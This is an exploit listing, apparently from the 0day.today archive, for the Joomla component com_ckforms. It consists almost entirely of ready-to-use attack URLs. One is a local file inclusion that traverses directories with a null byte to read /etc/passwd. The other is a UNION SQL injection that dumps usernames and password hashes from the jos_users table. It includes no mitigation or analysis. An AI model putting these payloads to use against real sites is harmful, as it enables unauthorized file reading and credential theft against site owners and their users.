Joomla Component com_ckforms (LFI/SQL) Multiple Vulnerabilities

===============================================================
Joomla Component com_ckforms (LFI/SQL) Multiple Vulnerabilities
===============================================================

####################################################################
 
===[ Exploit ]=== [LFI]
 
http://site/index.php?option=com_ckforms&controller=[LFI]
http://site.com/index.php?option=com_ckforms&controller=../../../.
./../../../../../../etc/passwd%00


 
===[ Exploit ]=== [sql]
 
http://site/index.php?option=com_ckforms&controller=ckdata&view=ckformsdata&layout=detail&task=detail&fid=-2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,group_concat(username,0x3a,password),35+from+jos_users--

####################################################################




#  0day.today [2018-04-12]  #